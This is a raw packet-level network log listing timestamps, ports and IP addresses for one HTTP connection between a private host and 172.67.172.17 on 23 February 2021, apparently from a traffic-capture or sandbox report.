Feb 23, 2021 15:31:25.921623945 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.921646118 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.921880007 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.921900034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.921955109 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.922286034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.922327995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.922727108 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.923022985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.923042059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.923438072 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.924078941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.924098969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.924817085 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.926583052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.926604986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.926736116 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.927793980 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.927815914 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.927932978 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.928302050 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.928327084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.928402901 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.929486990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.929513931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.929590940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.933446884 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.933470011 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.933696032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.933712959 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.933778048 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.933809996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.934525013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.934546947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.935321093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.935355902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.935446024 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.935477972 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.935703039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.935734987 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.936568022 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.936589003 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.936712980 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.936770916 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.938488960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.938509941 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.938702106 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.940814972 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.940836906 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.940937996 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.941463947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.941483021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.941576958 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.942500114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.942519903 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.942869902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.942902088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.942965031 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.942991972 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.943572998 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.943602085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.944329977 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.944350004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.944425106 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.944446087 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.945029020 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.945063114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.945753098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.945774078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.945879936 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.945911884 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.946468115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.946486950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.946657896 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.947158098 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.947180033 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.947798967 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.947870970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.947887897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.948065042 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.948549986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.948569059 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.949256897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.949278116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.949343920 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.949366093 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.949968100 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.949985981 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.950139046 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.950623989 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.950640917 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.950753927 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.951313019 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.951334953 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.951535940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.951980114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.951998949 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.952016115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.952084064 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.952946901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.952965021 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.952985048 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.953098059 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.953123093 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.953946114 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.953965902 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.953982115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.954833984 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.954852104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.954870939 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.955001116 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.955029011 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.955712080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.955732107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.955749035 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.955843925 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.956518888 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.956538916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.956554890 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.956645966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.956661940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.957381010 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.957416058 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.957432032 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.957668066 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.958185911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.958206892 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.958225012 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.958333015 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.958348036 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.959019899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.959054947 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.959100962 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.959139109 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.959867954 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.959891081 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.959907055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.960042000 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.960061073 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.960577965 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.960598946 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.960616112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.961370945 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.961426973 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.961443901 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.961457968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.961481094 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.961484909 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.962147951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.962171078 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.962187052 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.962460995 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.962912083 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.962930918 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.962948084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.963010073 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.963027954 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.963663101 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.963684082 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.963700056 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.963757038 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.964394093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.964412928 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.964430094 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.964497089 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.964515924 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.965173960 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965192080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965212107 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965297937 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.965852022 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965872049 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965888023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965909004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.965966940 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.965982914 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.966826916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.966846943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.966866016 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.966883898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.966939926 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.966955900 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.967853069 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.967875957 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.967892885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.967910051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.967988968 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.968010902 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.968739986 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.968837023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.968856096 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.968873024 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.969703913 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.969726086 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.969743013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.969758034 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.969829082 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.969852924 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.970202923 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.970763922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.970782995 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.970798969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.970814943 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.970866919 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.971544027 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.971571922 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.971611023 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.971618891 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.971633911 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.971637011 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.972465038 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.972485065 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.972501040 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.972515106 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.972522974 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.972538948 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.972613096 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.973314047 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.973336935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.973355055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.973371983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.973448038 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.973469973 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.974200964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.974220037 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.974255085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.974275112 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.974311113 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.974339008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.975094080 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975153923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975599051 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975616932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975651026 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975675106 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.975676060 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.975706100 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.976449013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.976469040 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.976497889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.976516008 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.976546049 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.976571083 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.976576090 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.977312088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977329969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977344990 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977360964 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977417946 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.977441072 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.977927923 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977947950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977963924 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977979898 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.977996111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978012085 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978046894 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.978076935 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.978904009 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978924036 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978951931 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978966951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.978982925 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979000092 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979044914 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.979072094 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.979824066 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979868889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979886055 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979902983 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979928970 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979944944 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.979943991 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.979968071 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.980597973 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.980777979 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980804920 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980820894 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980840921 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980858088 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980870962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.980874062 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.980887890 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.980964899 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.986188889 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986212969 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986233950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986253977 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986274004 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986294985 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.986398935 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.986426115 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.988341093 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988364935 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988385916 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988406897 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988428116 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988471031 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.988492966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.988580942 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.989502907 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989571095 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989619017 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989640951 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989660978 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989672899 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.989686012 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.989686966 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.990792990 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.991494894 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.991519928 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.992840052 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.993643045 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.993665934 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.993907928 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.995771885 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.995793104 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.995806932 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.995898962 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.995924950 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.998114109 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998135090 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998152018 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998169899 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998186111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998203039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998250008 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.998297930 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.998938084 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998958111 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998975039 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.998991013 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999011040 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999027967 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999094009 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.999109983 CET	49755	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:25.999488115 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999506950 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999524117 CET	80	49755	172.67.172.17	192.168.2.4
Feb 23, 2021 15:31:25.999540091 CET	80	49755	172.67.172.17	192.168.2.4
